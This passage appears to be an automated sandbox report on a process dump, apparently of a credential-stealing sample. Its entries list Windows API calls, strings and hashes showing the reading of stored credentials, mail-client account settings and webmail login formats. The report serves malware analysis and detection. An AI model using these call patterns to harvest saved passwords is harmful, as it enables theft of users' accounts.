                                                                                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                • API String ID: 2449869053-4258758744
                                                                                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                • API String ID: 3318079752-260894208
                                                                                                                                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                                                                • String ID: %s@yahoo.com
                                                                                                                                                • API String ID: 2240714685-3288273942
                                                                                                                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                Function 0040F460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 78143705-3916222277
                                                                                                                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                  • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                • String ID: %s@gmail.com
                                                                                                                                                • API String ID: 3261640601-4097000612
                                                                                                                                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                • API String ID: 632640181-966475738
                                                                                                                                                • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
